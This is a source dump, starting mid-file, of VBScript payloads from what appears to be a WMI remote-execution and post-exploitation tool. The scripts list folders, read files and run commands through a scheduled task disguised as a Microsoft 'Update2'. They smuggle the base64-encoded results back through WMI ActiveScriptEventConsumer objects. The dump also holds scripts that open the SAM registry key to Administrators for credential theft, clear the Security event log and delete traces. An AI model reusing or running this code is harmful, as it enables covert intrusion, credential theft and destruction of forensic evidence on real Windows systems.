BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | Dim sFolder, sExt, message 23 | sFolder = Base64Decode("QzpcVXNlcnNcUHVibGlj") 24 | 25 | Dim fs, oFolder, oFiles, oSubFolders 26 | set fs = CreateObject("Scripting.FileSystemObject") 27 | IF (fs.FolderExists(sFolder)) Then 28 | set oFolder = fs.GetFolder(sFolder) 29 | set oSubFolders = oFolder.SubFolders 30 | outdata = "" 31 | for each folder in oSubFolders 32 | message = "Folder:" & folder 33 | outdata = outdata & message & vbCrLf 34 | Next 35 | 36 | set oFiles = oFolder.Files 37 | for each file in oFiles 38 | sExt = fs.GetExtensionName(file) 39 | sExt = LCase(sExt) 40 | message = "FileName:" & file.Name & ", Extension :" & sExt 41 | outdata = outdata & message & vbCrLf 42 | Next 43 | ELSE 44 | Base64Encode = "UmFpZEVuTWVpOllvdSBhcmUgcHJvbXB0ZWQgdGhhdCB0aGUgZmlsZSBkb2VzIG5vdCBleGlzdA==" 45 | END IF 46 | 47 | Function btoa(sourceStr) 48 | Dim i, j, n, carr, rarr(), a, b, c 49 | carr = Array("A", "B", "C", "D", "E", "F", "G", "H", _ 50 | "I", "J", "K", "L", "M", "N", "O" ,"P", _ 51 | "Q", "R", "S", "T", "U", "V", "W", "X", _ 52 | "Y", "Z", "a", "b", "c", "d", "e", "f", _ 53 | "g", "h", "i", "j", "k", "l", "m", "n", _ 54 | "o", "p", "q", "r", "s", "t", "u", "v", _ 55 | "w", "x", "y", "z", "0", "1", "2", "3", _ 56 | "4", "5", "6", "7", "8", "9", "+", "/") 57 | n = Len(sourceStr)-1 58 | ReDim rarr(n\3) 59 | For i=0 To n Step 3 60 | a = AscW(Mid(sourceStr,i+1,1)) 61 | If i < n Then 62 | b = AscW(Mid(sourceStr,i+2,1)) 63 | Else 64 | b = 0 65 | End If 66 | If i < n-1 Then 67 | c = AscW(Mid(sourceStr,i+3,1)) 68 | Else 69 | c = 0 70 | End If 71 | rarr(i\3) = carr(a\4) & carr((a And 3) * 16 + b\16) & carr((b And 15) * 4 + c\64) & carr(c And 63) 72 | Next 73 | i = UBound(rarr) 74 | If n Mod 3 = 0 Then 75 | rarr(i) = Left(rarr(i),2) & "==" 76 | ElseIf n Mod 3 = 1 Then 77 | rarr(i) = Left(rarr(i),3) & "=" 78 | End If 79 | btoa = Join(rarr,"") 80 | End Function 81 | 82 | 83 | Function char_to_utf8(sChar) 84 | Dim c, b1, b2, b3 85 | c = AscW(sChar) 86 | If c < 0 Then 87 | c = c + &H10000 88 | End If 89 | If c < &H80 Then 90 | char_to_utf8 = sChar 91 | ElseIf c < &H800 Then 92 | b1 = c Mod 64 93 | b2 = (c - b1) / 64 94 | char_to_utf8 = ChrW(&HC0 + b2) & ChrW(&H80 + b1) 95 | ElseIf c < &H10000 Then 96 | b1 = c Mod 64 97 | b2 = ((c - b1) / 64) Mod 64 98 | b3 = (c - b1 - (64 * b2)) / 4096 99 | char_to_utf8 = ChrW(&HE0 + b3) & ChrW(&H80 + b2) & ChrW(&H80 + b1) 100 | Else 101 | End If 102 | End Function 103 | 104 | Function str_to_utf8(sSource) 105 | Dim i, n, rarr() 106 | n = Len(sSource) 107 | ReDim rarr(n - 1) 108 | For i=0 To n-1 109 | rarr(i) = char_to_utf8(Mid(sSource,i+1,1)) 110 | Next 111 | str_to_utf8 = Join(rarr,"") 112 | End Function 113 | 114 | Function str_to_base64(sSource) 115 | str_to_base64 = btoa(str_to_utf8(sSource)) 116 | End Function 117 | 118 | Base64Encode = str_to_base64(outdata) 119 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 120 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 121 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 122 | Set asec = temp.spawninstance_ 123 | asec.name="dd20e334-ea41-11ed-a1d3-68545aac985a" 124 | Asec.scriptingengine="vbscript" 125 | Asec.scripttext = Base64Encode 126 | asecpath=asec.put_ -------------------------------------------------------------------------------- /output/readfile.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | Set fso=CreateObject("Scripting.FileSystemObject") 23 | FilePath = Base64Decode("QzpcVXNlcnNcaml1c2hpXERlc2t0b3Bc5L2g5aaILnR4dA==") 24 | If fso.fileExists(FilePath) Then 25 | Set objStream = CreateObject("ADODB.Stream") 26 | objStream.Type = 1 'Binary 27 | objStream.Open 28 | objStream.LoadFromFile FilePath 29 | data = objStream.Read 30 | Set oXML = CreateObject("Msxml2.DOMDocument") 31 | Set oNode = oXML.CreateElement("base64") 32 | oNode.dataType = "bin.base64" 33 | oNode.nodeTypedValue = data 34 | Base64Encode = oNode.text 35 | Else 36 | Base64Encode = "UmFpZEVuTWVpOllvdSBhcmUgcHJvbXB0ZWQgdGhhdCB0aGUgZmlsZSBkb2VzIG5vdCBleGlzdA==" 37 | End If 38 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 39 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 40 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 41 | Set asec = temp.spawninstance_ 42 | asec.name="85ccadee-ea5c-11ed-887e-68545aac985a" 43 | Asec.scriptingengine="vbscript" 44 | Asec.scripttext = Base64Encode 45 | asecpath=asec.put_ -------------------------------------------------------------------------------- /output/reg_permission.vbs: -------------------------------------------------------------------------------- 1 | Set objWMIService = GetObject("winmgmts:\\.\root\Cimv2") 2 | Set objTrustee = objWMIService.Get("Win32_Trustee").SpawnInstance_() 3 | objTrustee.Domain = "BUILTIN" 4 | objTrustee.Name = "Administrators" 5 | objTrustee.SID = Array(1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0) 6 | objTrustee.SidLength = 16 7 | objTrustee.SIDString = "S-1-5-32-544" 8 | 9 | Set objNewACE = objWMIService.Get("Win32_ACE").SpawnInstance_() 10 | objNewACE.AccessMask = 983103 11 | objNewACE.AceType = 0 12 | objNewACE.AceFlags = 2 13 | objNewACE.Trustee = objTrustee 14 | 15 | Const HKLM = &H80000002 16 | strKeyPath = "SAM\SAM" 17 | Set oReg = GetObject("Winmgmts:\root\default:StdRegProv") 18 | RetVal = oReg.GetSecurityDescriptor(HKLM,strKeyPath,wmiSecurityDescriptor) 19 | DACL = wmiSecurityDescriptor.DACL 20 | ReDim objNewDacl(0) 21 | Set objNewDacl(0) = objNewACE 22 | For each objACE in DACL 23 | Ubd = UBound(objNewDacl) 24 | ReDim preserve objNewDacl(Ubd+1) 25 | Set objNewDacl(Ubd+1) = objACE 26 | Next 27 | wmiSecurityDescriptor.DACL = objNewDacl 28 | RetVal = oReg.SetSecurityDescriptor(HKLM,strKeyPath,wmiSecurityDescriptor) -------------------------------------------------------------------------------- /output/writeFile.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | Dim xmldoc, node, bytes 23 | Set xmldoc = CreateObject("Msxml2.DOMDocument") 24 | Set node = xmldoc.CreateElement("binary") 25 | node.DataType = "bin.hex" 26 | node.Text = "484b45595f4c4f43414c5f4d414348494e455c53414d205b312c312c315d0d0a484b45595f4c4f43414c5f4d414348494e455c53414d5c53414d205b312c312c315d0d0a484b45595f4c4f43414c5f4d414348494e455c53414d5c53414d5c446f6d61696e73205b312c312c315d0d0a484b45595f4c4f43414c5f4d414348494e455c53414d5c53414d5c446f6d61696e735c4163636f756e74205b312c312c315d0d0a484b45595f4c4f43414c5f4d414348494e455c53414d5c53414d5c446f6d61696e735c4163636f756e745c5573657273205b312c312c315d0d0a484b45595f4c4f43414c5f4d414348494e455c53414d5c53414d5c446f6d61696e735c4163636f756e745c55736572735c3030303030316635205b312c312c315d" 27 | bytes = node.NodeTypedValue 28 | FilePath = Base64Decode("QzpcV2luZG93c1xUZW1wXDliNjUxZjhkLWVkNGEtMTFlZC1iODNhLTY4NTQ1YWFjOTg1YS5pbmk=") 29 | Set objStream = CreateObject("ADODB.Stream") 30 | objStream.Type = 1 'Binary 31 | objStream.Open 32 | objStream.Write bytes 33 | objStream.SaveToFile FilePath, 2 'Overwrite 34 | objStream.Close -------------------------------------------------------------------------------- /vbs/clearEventLog.vbs: -------------------------------------------------------------------------------- 1 | Set LogFileSet = GetObject("winmgmts:{(Backup,Security)}").ExecQuery("select * from Win32_NTEventLogFile where LogfileName='AAAAAAAAAAAAAAAAAAAAAAAAAAA'") 2 | 3 | for each Logfile in LogFileSet 4 | RetVal = LogFile.ClearEventlog() 5 | if RetVal = 0 then WScript.Echo "Log Cleared" 6 | next -------------------------------------------------------------------------------- /vbs/cleartrace.vbs: -------------------------------------------------------------------------------- 1 | Set objWMIService = GetObject("winmgmts:\\.\root\subscription") 2 | Set ScriptIds = objWMIService.ExecQuery("select * from ActiveScriptEventConsumer") 3 | Set fso=CreateObject("Scripting.FileSystemObject") 4 | If ScriptIds.count<>0 Then 5 | For Each Object In ScriptIds 6 | Object.Delete_ 7 | FilePath = "C:\Windows\Temp\" 8 | If fso.fileExists(FilePath & Object.Name & ".txt") Then 9 | fso.DeleteFile(FilePath & Object.Name & ".txt") 10 | ElseIf fso.fileExists(FilePath & Object.Name & "er.txt") Then 11 | fso.DeleteFile(FilePath & Object.Name & "er.txt") 12 | End If 13 | Next 14 | End If 15 | Set LogFileSet = GetObject("winmgmts:{(Backup,Security)}").ExecQuery("select * from Win32_NTEventLogFile where LogfileName='security'") 16 | 17 | for each Logfile in LogFileSet 18 | RetVal = LogFile.ClearEventlog() 19 | next -------------------------------------------------------------------------------- /vbs/dele_file.vbs: -------------------------------------------------------------------------------- 1 | Set file=CreateObject("Scripting.FileSystemObject") 2 | file.DeleteFile("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") 3 | file.DeleteFile("C:\Windows\Temp\DDDDDDDDDDer_.txt") -------------------------------------------------------------------------------- /vbs/delete_file.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | 23 | Set file=CreateObject("Scripting.FileSystemObject") 24 | file.DeleteFile(Base64Decode("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")) -------------------------------------------------------------------------------- /vbs/exec2_command.vbs: -------------------------------------------------------------------------------- 1 | FilePath = "C:\Windows\Temp\BBBBBBBBBBB" 2 | FilePath2 = "C:\Windows\Temp\DDDDDDDDDDer_.txt" 3 | 4 | Set fso=CreateObject("Scripting.FileSystemObject") 5 | If fso.fileExists(FilePath) Then 6 | Set objFileToRead = CreateObject("Scripting.FileSystemObject") 7 | file2size = objFileToRead.GetFile(FilePath2).size 8 | 9 | If file2size <> 0 Then 10 | Set fileread = objFileToRead.OpenTextFile(FilePath2,1) 11 | strFileText = fileread.ReadAll() 12 | b64text = str_to_base64(strFileText) 13 | Else 14 | Set fileread = objFileToRead.OpenTextFile(FilePath,1) 15 | strFileText = fileread.ReadAll() 16 | b64text = str_to_base64(strFileText) 17 | End If 18 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 19 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 20 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 21 | Set asec = temp.spawninstance_ 22 | asec.name="CCCCCCCCCCCCC" 23 | Asec.scriptingengine="vbscript" 24 | Asec.scripttext = b64text 25 | asecpath=asec.put_ 26 | End If 27 | 28 | Function Base64Decode(ByVal vCode) 29 | Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64") 30 | oNode.dataType = "bin.base64" 31 | oNode.text = vCode 32 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 33 | Set oNode = Nothing 34 | End Function 35 | 36 | Function Stream_BinaryToString(Binary) 37 | Set BinaryStream = CreateObject("ADODB.Stream") 38 | BinaryStream.Type = 1 39 | BinaryStream.Open 40 | BinaryStream.Write Binary 41 | BinaryStream.Position = 0 42 | BinaryStream.Type = 2 43 | ' All Format => utf-16le - utf-8 - utf-16le 44 | BinaryStream.CharSet = "utf-8" 45 | Stream_BinaryToString = BinaryStream.ReadText 46 | Set BinaryStream = Nothing 47 | End Function 48 | 49 | Const TriggerTypeDaily = 1 50 | Const ActionTypeExec = 0 51 | Set service = CreateObject("Schedule.Service") 52 | Call service.Connect 53 | Dim rootFolder 54 | Set rootFolder = service.GetFolder("\") 55 | Dim taskDefinition 56 | Set taskDefinition = service.NewTask(0) 57 | Dim regInfo 58 | Set regInfo = taskDefinition.RegistrationInfo 59 | regInfo.Description = "Update2" 60 | regInfo.Author = "Microsoft" 61 | Dim settings 62 | Set settings = taskDefinition.settings 63 | settings.Enabled = True 64 | settings.StartWhenAvailable = True 65 | settings.Hidden = False 66 | settings.DisallowStartIfOnBatteries = False 67 | Dim triggers 68 | Set triggers = taskDefinition.triggers 69 | Dim trigger 70 | Set trigger = triggers.Create(7) 71 | Dim Action 72 | Set Action = taskDefinition.Actions.Create(ActionTypeExec) 73 | Action.Path = "c:\windows\system32\cmd.exe" 74 | Action.arguments = chr(34) & "/Q /c AAAAAAAAAAAA > C:\Windows\Temp\BBBBBBBBBBB 2> C:\Windows\Temp\DDDDDDDDDDer_.txt" & chr(34) 75 | Dim objNet, LoginUser 76 | Set objNet = CreateObject("WScript.Network") 77 | LoginUser = objNet.UserName 78 | If UCase(LoginUser) = "SYSTEM" Then 79 | Else 80 | LoginUser = Empty 81 | End If 82 | Call rootFolder.RegisterTaskDefinition("CCCCCCCCCCCCC", taskDefinition, 6, LoginUser, , 3) 83 | Call rootFolder.DeleteTask("CCCCCCCCCCCCC",0) 84 | 85 | Function btoa(sourceStr) 86 | Dim i, j, n, carr, rarr(), a, b, c 87 | carr = Array("A", "B", "C", "D", "E", "F", "G", "H", _ 88 | "I", "J", "K", "L", "M", "N", "O" ,"P", _ 89 | "Q", "R", "S", "T", "U", "V", "W", "X", _ 90 | "Y", "Z", "a", "b", "c", "d", "e", "f", _ 91 | "g", "h", "i", "j", "k", "l", "m", "n", _ 92 | "o", "p", "q", "r", "s", "t", "u", "v", _ 93 | "w", "x", "y", "z", "0", "1", "2", "3", _ 94 | "4", "5", "6", "7", "8", "9", "+", "/") 95 | n = Len(sourceStr)-1 96 | ReDim rarr(n\3) 97 | For i=0 To n Step 3 98 | a = AscW(Mid(sourceStr,i+1,1)) 99 | If i < n Then 100 | b = AscW(Mid(sourceStr,i+2,1)) 101 | Else 102 | b = 0 103 | End If 104 | If i < n-1 Then 105 | c = AscW(Mid(sourceStr,i+3,1)) 106 | Else 107 | c = 0 108 | End If 109 | rarr(i\3) = carr(a\4) & carr((a And 3) * 16 + b\16) & carr((b And 15) * 4 + c\64) & carr(c And 63) 110 | Next 111 | i = UBound(rarr) 112 | If n Mod 3 = 0 Then 113 | rarr(i) = Left(rarr(i),2) & "==" 114 | ElseIf n Mod 3 = 1 Then 115 | rarr(i) = Left(rarr(i),3) & "=" 116 | End If 117 | btoa = Join(rarr,"") 118 | End Function 119 | 120 | 121 | Function char_to_utf8(sChar) 122 | Dim c, b1, b2, b3 123 | c = AscW(sChar) 124 | If c < 0 Then 125 | c = c + &H10000 126 | End If 127 | If c < &H80 Then 128 | char_to_utf8 = sChar 129 | ElseIf c < &H800 Then 130 | b1 = c Mod 64 131 | b2 = (c - b1) / 64 132 | char_to_utf8 = ChrW(&HC0 + b2) & ChrW(&H80 + b1) 133 | ElseIf c < &H10000 Then 134 | b1 = c Mod 64 135 | b2 = ((c - b1) / 64) Mod 64 136 | b3 = (c - b1 - (64 * b2)) / 4096 137 | char_to_utf8 = ChrW(&HE0 + b3) & ChrW(&H80 + b2) & ChrW(&H80 + b1) 138 | Else 139 | End If 140 | End Function 141 | 142 | Function str_to_utf8(sSource) 143 | Dim i, n, rarr() 144 | n = Len(sSource) 145 | ReDim rarr(n - 1) 146 | For i=0 To n-1 147 | rarr(i) = char_to_utf8(Mid(sSource,i+1,1)) 148 | Next 149 | str_to_utf8 = Join(rarr,"") 150 | End Function 151 | 152 | Function str_to_base64(sSource) 153 | str_to_base64 = btoa(str_to_utf8(sSource)) 154 | End Function 155 | 156 | 157 | 158 | -------------------------------------------------------------------------------- /vbs/exec_command_read.vbs: -------------------------------------------------------------------------------- 1 | Function btoa(sourceStr) 2 | Dim i, j, n, carr, rarr(), a, b, c 3 | carr = Array("A", "B", "C", "D", "E", "F", "G", "H", _ 4 | "I", "J", "K", "L", "M", "N", "O" ,"P", _ 5 | "Q", "R", "S", "T", "U", "V", "W", "X", _ 6 | "Y", "Z", "a", "b", "c", "d", "e", "f", _ 7 | "g", "h", "i", "j", "k", "l", "m", "n", _ 8 | "o", "p", "q", "r", "s", "t", "u", "v", _ 9 | "w", "x", "y", "z", "0", "1", "2", "3", _ 10 | "4", "5", "6", "7", "8", "9", "+", "/") 11 | n = Len(sourceStr)-1 12 | ReDim rarr(n\3) 13 | For i=0 To n Step 3 14 | a = AscW(Mid(sourceStr,i+1,1)) 15 | If i < n Then 16 | b = AscW(Mid(sourceStr,i+2,1)) 17 | Else 18 | b = 0 19 | End If 20 | If i < n-1 Then 21 | c = AscW(Mid(sourceStr,i+3,1)) 22 | Else 23 | c = 0 24 | End If 25 | rarr(i\3) = carr(a\4) & carr((a And 3) * 16 + b\16) & carr((b And 15) * 4 + c\64) & carr(c And 63) 26 | Next 27 | i = UBound(rarr) 28 | If n Mod 3 = 0 Then 29 | rarr(i) = Left(rarr(i),2) & "==" 30 | ElseIf n Mod 3 = 1 Then 31 | rarr(i) = Left(rarr(i),3) & "=" 32 | End If 33 | btoa = Join(rarr,"") 34 | End Function 35 | 36 | 37 | Function char_to_utf8(sChar) 38 | Dim c, b1, b2, b3 39 | c = AscW(sChar) 40 | If c < 0 Then 41 | c = c + &H10000 42 | End If 43 | If c < &H80 Then 44 | char_to_utf8 = sChar 45 | ElseIf c < &H800 Then 46 | b1 = c Mod 64 47 | b2 = (c - b1) / 64 48 | char_to_utf8 = ChrW(&HC0 + b2) & ChrW(&H80 + b1) 49 | ElseIf c < &H10000 Then 50 | b1 = c Mod 64 51 | b2 = ((c - b1) / 64) Mod 64 52 | b3 = (c - b1 - (64 * b2)) / 4096 53 | char_to_utf8 = ChrW(&HE0 + b3) & ChrW(&H80 + b2) & ChrW(&H80 + b1) 54 | Else 55 | End If 56 | End Function 57 | 58 | Function str_to_utf8(sSource) 59 | Dim i, n, rarr() 60 | n = Len(sSource) 61 | ReDim rarr(n - 1) 62 | For i=0 To n-1 63 | rarr(i) = char_to_utf8(Mid(sSource,i+1,1)) 64 | Next 65 | str_to_utf8 = Join(rarr,"") 66 | End Function 67 | 68 | Function str_to_base64(sSource) 69 | str_to_base64 = btoa(str_to_utf8(sSource)) 70 | End Function 71 | 72 | Set objFileToRead = CreateObject("Scripting.FileSystemObject").OpenTextFile("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",1) 73 | strFileText = objFileToRead.ReadAll() 74 | b64text = str_to_base64(strFileText) 75 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 76 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 77 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 78 | Set asec = temp.spawninstance_ 79 | asec.name="BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" 80 | Asec.scriptingengine="vbscript" 81 | Asec.scripttext = b64text 82 | asecpath=asec.put_ -------------------------------------------------------------------------------- /vbs/listdir.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | Dim sFolder, sExt, message 23 | sFolder = Base64Decode("AAAAAAAAAAAAAAAAAAAA") 24 | 25 | Dim fs, oFolder, oFiles, oSubFolders 26 | set fs = CreateObject("Scripting.FileSystemObject") 27 | IF (fs.FolderExists(sFolder)) Then 28 | set oFolder = fs.GetFolder(sFolder) 29 | set oSubFolders = oFolder.SubFolders 30 | outdata = "" 31 | for each folder in oSubFolders 32 | message = "Folder:" & folder 33 | outdata = outdata & message & vbCrLf 34 | Next 35 | 36 | set oFiles = oFolder.Files 37 | for each file in oFiles 38 | sExt = fs.GetExtensionName(file) 39 | sExt = LCase(sExt) 40 | message = "FileName:" & file.Name & ", Extension :" & sExt 41 | outdata = outdata & message & vbCrLf 42 | Next 43 | ELSE 44 | Base64Encode = "UmFpZEVuTWVpOllvdSBhcmUgcHJvbXB0ZWQgdGhhdCB0aGUgZmlsZSBkb2VzIG5vdCBleGlzdA==" 45 | END IF 46 | 47 | Function btoa(sourceStr) 48 | Dim i, j, n, carr, rarr(), a, b, c 49 | carr = Array("A", "B", "C", "D", "E", "F", "G", "H", _ 50 | "I", "J", "K", "L", "M", "N", "O" ,"P", _ 51 | "Q", "R", "S", "T", "U", "V", "W", "X", _ 52 | "Y", "Z", "a", "b", "c", "d", "e", "f", _ 53 | "g", "h", "i", "j", "k", "l", "m", "n", _ 54 | "o", "p", "q", "r", "s", "t", "u", "v", _ 55 | "w", "x", "y", "z", "0", "1", "2", "3", _ 56 | "4", "5", "6", "7", "8", "9", "+", "/") 57 | n = Len(sourceStr)-1 58 | ReDim rarr(n\3) 59 | For i=0 To n Step 3 60 | a = AscW(Mid(sourceStr,i+1,1)) 61 | If i < n Then 62 | b = AscW(Mid(sourceStr,i+2,1)) 63 | Else 64 | b = 0 65 | End If 66 | If i < n-1 Then 67 | c = AscW(Mid(sourceStr,i+3,1)) 68 | Else 69 | c = 0 70 | End If 71 | rarr(i\3) = carr(a\4) & carr((a And 3) * 16 + b\16) & carr((b And 15) * 4 + c\64) & carr(c And 63) 72 | Next 73 | i = UBound(rarr) 74 | If n Mod 3 = 0 Then 75 | rarr(i) = Left(rarr(i),2) & "==" 76 | ElseIf n Mod 3 = 1 Then 77 | rarr(i) = Left(rarr(i),3) & "=" 78 | End If 79 | btoa = Join(rarr,"") 80 | End Function 81 | 82 | 83 | Function char_to_utf8(sChar) 84 | Dim c, b1, b2, b3 85 | c = AscW(sChar) 86 | If c < 0 Then 87 | c = c + &H10000 88 | End If 89 | If c < &H80 Then 90 | char_to_utf8 = sChar 91 | ElseIf c < &H800 Then 92 | b1 = c Mod 64 93 | b2 = (c - b1) / 64 94 | char_to_utf8 = ChrW(&HC0 + b2) & ChrW(&H80 + b1) 95 | ElseIf c < &H10000 Then 96 | b1 = c Mod 64 97 | b2 = ((c - b1) / 64) Mod 64 98 | b3 = (c - b1 - (64 * b2)) / 4096 99 | char_to_utf8 = ChrW(&HE0 + b3) & ChrW(&H80 + b2) & ChrW(&H80 + b1) 100 | Else 101 | End If 102 | End Function 103 | 104 | Function str_to_utf8(sSource) 105 | Dim i, n, rarr() 106 | n = Len(sSource) 107 | ReDim rarr(n - 1) 108 | For i=0 To n-1 109 | rarr(i) = char_to_utf8(Mid(sSource,i+1,1)) 110 | Next 111 | str_to_utf8 = Join(rarr,"") 112 | End Function 113 | 114 | Function str_to_base64(sSource) 115 | str_to_base64 = btoa(str_to_utf8(sSource)) 116 | End Function 117 | 118 | Base64Encode = str_to_base64(outdata) 119 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 120 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 121 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 122 | Set asec = temp.spawninstance_ 123 | asec.name="BBBBBBBBBBBBBBBBBBBBBBB" 124 | Asec.scriptingengine="vbscript" 125 | Asec.scripttext = Base64Encode 126 | asecpath=asec.put_ -------------------------------------------------------------------------------- /vbs/readfile.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | Set fso=CreateObject("Scripting.FileSystemObject") 23 | FilePath = Base64Decode("AAAAAAAAAAAAAAAAAAAAA") 24 | If fso.fileExists(FilePath) Then 25 | Set objStream = CreateObject("ADODB.Stream") 26 | objStream.Type = 1 'Binary 27 | objStream.Open 28 | objStream.LoadFromFile FilePath 29 | data = objStream.Read 30 | Set oXML = CreateObject("Msxml2.DOMDocument") 31 | Set oNode = oXML.CreateElement("base64") 32 | oNode.dataType = "bin.base64" 33 | oNode.nodeTypedValue = data 34 | Base64Encode = oNode.text 35 | Else 36 | Base64Encode = "UmFpZEVuTWVpOllvdSBhcmUgcHJvbXB0ZWQgdGhhdCB0aGUgZmlsZSBkb2VzIG5vdCBleGlzdA==" 37 | End If 38 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 39 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 40 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 41 | Set asec = temp.spawninstance_ 42 | asec.name="BBBBBBBBBBBBBBBBBBBBBBB" 43 | Asec.scriptingengine="vbscript" 44 | Asec.scripttext = Base64Encode 45 | asecpath=asec.put_ -------------------------------------------------------------------------------- /vbs/reg_permission.vbs: -------------------------------------------------------------------------------- 1 | Set objWMIService = GetObject("winmgmts:\\.\root\Cimv2") 2 | Set objTrustee = objWMIService.Get("Win32_Trustee").SpawnInstance_() 3 | objTrustee.Domain = "BUILTIN" 4 | objTrustee.Name = "Administrators" 5 | objTrustee.SID = Array(1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0) 6 | objTrustee.SidLength = 16 7 | objTrustee.SIDString = "S-1-5-32-544" 8 | 9 | Set objNewACE = objWMIService.Get("Win32_ACE").SpawnInstance_() 10 | objNewACE.AccessMask = 983103 11 | objNewACE.AceType = 0 12 | objNewACE.AceFlags = 2 13 | objNewACE.Trustee = objTrustee 14 | 15 | Const HKLM = &H80000002 16 | strKeyPath = "SAM\SAM" 17 | Set oReg = GetObject("Winmgmts:\root\default:StdRegProv") 18 | RetVal = oReg.GetSecurityDescriptor(HKLM,strKeyPath,wmiSecurityDescriptor) 19 | DACL = wmiSecurityDescriptor.DACL 20 | ReDim objNewDacl(0) 21 | Set objNewDacl(0) = objNewACE 22 | For each objACE in DACL 23 | Ubd = UBound(objNewDacl) 24 | ReDim preserve objNewDacl(Ubd+1) 25 | Set objNewDacl(Ubd+1) = objACE 26 | Next 27 | wmiSecurityDescriptor.DACL = objNewDacl 28 | RetVal = 